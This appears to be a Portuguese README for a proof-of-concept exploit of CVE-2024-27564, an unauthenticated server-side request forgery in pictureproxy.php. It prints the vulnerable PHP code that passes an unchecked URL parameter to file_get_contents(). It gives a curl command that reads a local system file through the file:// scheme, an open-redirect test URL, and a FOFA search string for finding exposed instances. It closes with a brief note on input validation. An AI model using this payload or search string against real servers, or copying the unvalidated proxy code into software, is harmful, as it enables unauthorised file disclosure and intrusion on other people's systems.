
Exploit de prova de conceito para CVE-2024-27564, demonstrando SSRF via parâmetro de URL não validado em pictureproxy.php. Inclui teste baseado em curl e busca FOFA por instâncias vulneráveis.
Este projeto demonstra uma vulnerabilidade de Server-Side Request Forgery (SSRF) no arquivo pictureproxy.php.
Uma vulnerabilidade no pictureproxy.php permite que atacantes remotos realizem requisições arbitrárias injetando URLs no parâmetro url. Esta vulnerabilidade SSRF pode ser explorada sem autenticação, tornando-a particularmente perigosa.
O código vulnerável está no arquivo pictureproxy.php. O problema ocorre porque a função não valida adequadamente o parâmetro url. A variável $_GET['url'] é passada para a função file_get_contents(), que busca conteúdo da URL especificada. Isso pode levar a SSRF.
Aqui está uma prova de conceito simples que mostra como a vulnerabilidade pode ser explorada:
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Para testar a vulnerabilidade, você pode usar o seguinte comando curl:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
Um teste usando uma vulnerabilidade de redirecionamento aberto:
https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg
Banner
"title="ChatGPT个人专用版""
Este projeto destaca a importância de validar adequadamente as entradas do usuário para evitar vulnerabilidades SSRF. Sempre garanta que parâmetros como URLs sejam minuciosamente verificados antes de serem processados.